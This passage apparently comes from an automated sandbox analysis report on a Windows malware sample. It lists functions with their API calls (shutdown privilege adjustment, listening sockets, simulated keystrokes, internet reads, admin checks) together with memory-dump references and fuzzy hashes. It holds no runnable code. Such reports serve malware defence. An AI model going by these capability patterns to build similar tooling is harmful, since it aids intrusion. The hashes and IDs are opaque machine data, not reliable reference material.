                                                                                        • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                                        • String ID: *.*
                                                                                        • API String ID: 2185952417-438819550
                                                                                        • Opcode ID: b6d7913e66e421f728600b78104b59bd046eded856540a3e4018dcf80930c6e6
                                                                                        • Instruction ID: a2ffca65eaf7b841545488f117f042765cebf3ec3d76fa6d89d7a6e310683635
                                                                                        • Opcode Fuzzy Hash: b6d7913e66e421f728600b78104b59bd046eded856540a3e4018dcf80930c6e6
                                                                                        • Instruction Fuzzy Hash: 6E415E71A4021AABDF25DF64CD69AEEBBB8FF05350F5481A5E814A31A1EB309A44CF50
                                                                                        Function 00B05778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AF9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF93E3
                                                                                          • Part of subcall function 00AF9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF9410
                                                                                          • Part of subcall function 00AF9399: GetLastError.KERNEL32 ref: 00AF941D
                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00B057B4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                        • API String ID: 2234035333-194228
                                                                                        • Opcode ID: 2bcdcf979292dbfd96eef3268c339bd4aa34dca51c6b284347dd9c76f756e744
                                                                                        • Instruction ID: 5fbeb32b7b3359a862650feba63cee61af9c8d232307b3239aa2ede846e811c2
                                                                                        • Opcode Fuzzy Hash: 2bcdcf979292dbfd96eef3268c339bd4aa34dca51c6b284347dd9c76f756e744
                                                                                        • Instruction Fuzzy Hash: 7701F231751716EAE73862A49C8ABBF7EDCEF08740F2001E9F913E68D2EA505C40A961
                                                                                        Function 00B1696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00B169C7
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B169D6
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00B169F2
                                                                                        • listen.WSOCK32(00000000,00000005), ref: 00B16A01
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B16A1B
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00B16A2F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                        • String ID:
                                                                                        • API String ID: 1279440585-0
                                                                                        • Opcode ID: e5c2e5c857e6f9cb7d08fa8ecedce3a06c2335d37ddb2c28370edc3eeb3adfbd
                                                                                        • Instruction ID: 7b64075a05d5bfb53daf4e6aef6db84450fa4fb30ee0b3e3980aa1a0a08da167
                                                                                        • Opcode Fuzzy Hash: e5c2e5c857e6f9cb7d08fa8ecedce3a06c2335d37ddb2c28370edc3eeb3adfbd
                                                                                        • Instruction Fuzzy Hash: 9921B130600604AFCB10EF64CD99A6EB7E9EF49720F248599F956A73D1CB70AD41CB91
                                                                                        Function 00AA1663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00AA1DD6
                                                                                        • GetSysColor.USER32(0000000F), ref: 00AA1E2A
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 00AA1E3D
                                                                                          • Part of subcall function 00AA166C: DefDlgProcW.USER32(?,00000020,?), ref: 00AA16B4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ColorProc$LongWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3744519093-0
                                                                                        • Opcode ID: 115798a7fed15164ebba7c2928cba9e43ed6b80fcef0ba73e64db52ed34d5a96
                                                                                        • Instruction ID: f4a5608b42de77a866758effa38057eb65c034dc7b2a63e51a31b900e801d1ec
                                                                                        • Opcode Fuzzy Hash: 115798a7fed15164ebba7c2928cba9e43ed6b80fcef0ba73e64db52ed34d5a96
                                                                                        • Instruction Fuzzy Hash: F8A1437412A514FEE628AB699C49EBF39AEEF47305F25050BF402D72D2CF259D01C2B6
                                                                                        Function 00B0C2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00B0C329
                                                                                        • _wcscmp.LIBCMT ref: 00B0C359
                                                                                        • _wcscmp.LIBCMT ref: 00B0C36E
                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00B0C37F
                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00B0C3AF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                        • String ID:
                                                                                        • API String ID: 2387731787-0
                                                                                        • Opcode ID: 75e42d525ba4d0561fbe213e89ce437e1583475037488dd63c23df3434b78d25
                                                                                        • Instruction ID: d2fff0097ce310c3f60d48c34ada649e1411fcf862e7e6b88900d69543d2c6eb
                                                                                        • Opcode Fuzzy Hash: 75e42d525ba4d0561fbe213e89ce437e1583475037488dd63c23df3434b78d25
                                                                                        • Instruction Fuzzy Hash: A4517A756046028FD714DF68D590EAABBE8FF49310F11869DF956873A1DB30ED04CB91
                                                                                        Function 00B16E32 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00B18475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00B184A0
                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00B16E89
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B16EB2
                                                                                        • bind.WSOCK32(00000000,?,00000010), ref: 00B16EEB
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00B16EF8
                                                                                        • closesocket.WSOCK32(00000000,00000000), ref: 00B16F0C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                        • String ID:
                                                                                        • API String ID: 99427753-0
                                                                                        • Opcode ID: 003f556f130c3686397c23476f88ed748dcca4eda4a01f3b2e33d7966faae0ec
                                                                                        • Instruction ID: bc0cc9ca9a82ca47b29dc7e77cb42db08420677c246654d82c6d21fe19231859
                                                                                        • Opcode Fuzzy Hash: 003f556f130c3686397c23476f88ed748dcca4eda4a01f3b2e33d7966faae0ec
                                                                                        • Instruction Fuzzy Hash: 0541B275600210AFDB10AF64D986FBE77E8DF89710F448558FA15AB3D2DBB0AD018BA1
                                                                                        Function 00B259B3 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                        • String ID:
                                                                                        • API String ID: 292994002-0
                                                                                        • Opcode ID: ac0718c95d0af253841673ed3b69939290be7d86dbd7c0ea747ceb7653c90173
                                                                                        • Instruction ID: 5b5cde3ceedeef06f54d378392cc5a203a6c7a3d0128079126e0180faae8df1a
                                                                                        • Opcode Fuzzy Hash: ac0718c95d0af253841673ed3b69939290be7d86dbd7c0ea747ceb7653c90173
                                                                                        • Instruction Fuzzy Hash: CF11E7723109219FE7316F66AC85A2E7BD9FF86761B154169F80AD7241CF70ED018AE0
                                                                                        Function 00AE0030 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LocalTime__swprintf
                                                                                        • String ID: %.3d$WIN_XPe
                                                                                        • API String ID: 2070861257-2409531811
                                                                                        • Opcode ID: cfdb68d8d2fb710c0c24efd6ccb52a2f89ebef128ccab151644a3856bb2cabaa
                                                                                        • Instruction ID: 4837aee1ee054e85667d6562ae6f47733ff996fb937ac53876baaef3df04f5cd
                                                                                        • Opcode Fuzzy Hash: cfdb68d8d2fb710c0c24efd6ccb52a2f89ebef128ccab151644a3856bb2cabaa
                                                                                        • Instruction Fuzzy Hash: D7D01272814148EACB159B92CD44EFE737CEB08300F604092F506E2080D77587C89B22
                                                                                        Function 00B129BA Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 00B12AAD
                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B12AE4
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                        • String ID:
                                                                                        • API String ID: 599397726-0
                                                                                        • Opcode ID: 5d9268f135d93d549594c271e683dea0b323820346ea5e6a513fa8b0a7d537d2
                                                                                        • Instruction ID: 9a1d10d73227700d82616cd384f742453e3a181176f4959f1c41798d0ee8034a
                                                                                        • Opcode Fuzzy Hash: 5d9268f135d93d549594c271e683dea0b323820346ea5e6a513fa8b0a7d537d2
                                                                                        • Instruction Fuzzy Hash: AA41D171604209FFEB20DF54CC81EFBB7ECEF40754F5040AEF605A6241EA70AEA19660
                                                                                        Function 00AF9399 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AC0FE6: std::exception::exception.LIBCMT ref: 00AC101C
                                                                                          • Part of subcall function 00AC0FE6: __CxxThrowException@8.LIBCMT ref: 00AC1031
                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AF93E3
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AF9410
                                                                                        • GetLastError.KERNEL32 ref: 00AF941D
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 1922334811-0
                                                                                        • Opcode ID: bb545d6159cadafd09ca78c6a6195bdd686914f2ef330d3001147ce469c411e9
                                                                                        • Instruction ID: 8bc5e05d1e5759e81f6342d046b0585f11ba2732133ab7679213285483ce5a57
                                                                                        • Opcode Fuzzy Hash: bb545d6159cadafd09ca78c6a6195bdd686914f2ef330d3001147ce469c411e9
                                                                                        • Instruction Fuzzy Hash: C2119DB1514209AFD728AF54DD85E2FB7BCEB44310B20812EF45A87250EA30AC41CA64
                                                                                        Function 00B042D5 Relevance: 4.6, APIs: 3, Instructions: 61fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B042FF
                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00B0433C
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00B04345
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                        • String ID:
                                                                                        • API String ID: 33631002-0
                                                                                        • Opcode ID: 0cd8550c3e84ea0f4956239b712dbe6f51e7eaf94d3696b55c7d38b95c359866
                                                                                        • Instruction ID: 1a9f94d0a331cc69e34e059095d6ac9898eb4d9f5574213828700228f4874143
                                                                                        • Opcode Fuzzy Hash: 0cd8550c3e84ea0f4956239b712dbe6f51e7eaf94d3696b55c7d38b95c359866
                                                                                        • Instruction Fuzzy Hash: 171182B1910229BFE7109BE89C44FAFBBBCEB08710F100256BA14E71D0C7745D0087A5
                                                                                        Function 00B04F1C Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00B04F45
                                                                                        • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00B04F5C
                                                                                        • FreeSid.ADVAPI32(?), ref: 00B04F6C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                        • String ID:
                                                                                        • API String ID: 3429775523-0
                                                                                        • Opcode ID: 68fce83ea3cfc9873fe0ada522c4f971840d53d8b76bbc3f2d0b206d1af87e6b
                                                                                        • Instruction ID: fac41e64e96661951f795b74a338186a488f9915506e9b53775f79ccce78d6ee
                                                                                        • Opcode Fuzzy Hash: 68fce83ea3cfc9873fe0ada522c4f971840d53d8b76bbc3f2d0b206d1af87e6b
                                                                                        • Instruction Fuzzy Hash: 60F04975A1130DBFDF04DFE0DC99AAEBBBCEF08201F1044A9AA01E3580E7346A048B50
                                                                                        Function 00B01AC6 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00B01B01
                                                                                        • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00B01B14
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: InputSendkeybd_event
                                                                                        • String ID:
                                                                                        • API String ID: 3536248340-0
                                                                                        • Opcode ID: 6f56eaf34bfc059dd948dd99d3ac28708f01d499b593495de1af61596b40113b
                                                                                        • Instruction ID: 51d6e1afad05bb5873889644537aa67ea4e1dcb570e344b32041c028d6a7908f
                                                                                        • Opcode Fuzzy Hash: 6f56eaf34bfc059dd948dd99d3ac28708f01d499b593495de1af61596b40113b
                                                                                        • Instruction Fuzzy Hash: B8F0A93190020CABDB04DF98C845BFE7BB8FF14305F10804AF94596292D339C611DF94
                                                                                        Function 00B0A6AD Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00B19B52,?,00B3098C,?), ref: 00B0A6DA
                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00B19B52,?,00B3098C,?), ref: 00B0A6EC
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorFormatLastMessage
                                                                                        • String ID:
                                                                                        • API String ID: 3479602957-0
                                                                                        • Opcode ID: 73d41ff3bef5a2c16c1814008e81a144bcf552e6d5140b60f8fc76a3d165416d
                                                                                        • Instruction ID: 6a4613dabe0068ce68393ce8aaa2062f0ca1f4cdd4a5ae95bbc7de2ad55a05bd
                                                                                        • Opcode Fuzzy Hash: 73d41ff3bef5a2c16c1814008e81a144bcf552e6d5140b60f8fc76a3d165416d
                                                                                        • Instruction Fuzzy Hash: 11F0A73551432EBBDB20AFA4CC48FEA77ACFF09761F008196B909D7281DA309940CBE1
                                                                                        Function 00AF8DE9 Relevance: 3.0, APIs: 2, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AF8F27), ref: 00AF8DFE
                                                                                        • CloseHandle.KERNEL32(?,?,00AF8F27), ref: 00AF8E10
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                        • String ID:
                                                                                        • API String ID: 81990902-0
                                                                                        • Opcode ID: 1cd668a30ec6e9f6462e3993c309c1ef57b401d75f434ede92be749af2742cdd
                                                                                        • Instruction ID: 8c3c02b8665209e0202462e3a621b65e35ca9d9a1919f7d1b51a4b740376dc4e
                                                                                        • Opcode Fuzzy Hash: 1cd668a30ec6e9f6462e3993c309c1ef57b401d75f434ede92be749af2742cdd
                                                                                        • Instruction Fuzzy Hash: CCE08C32010600EFEB262B60ED18E777BBDEF04310B20882EF49A80470CB22ACD0DB14
                                                                                        Function 00ACA385 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AC8F87,?,?,?,00000001), ref: 00ACA38A
                                                                                        • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00ACA393
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                        • String ID:
                                                                                        • API String ID: 3192549508-0
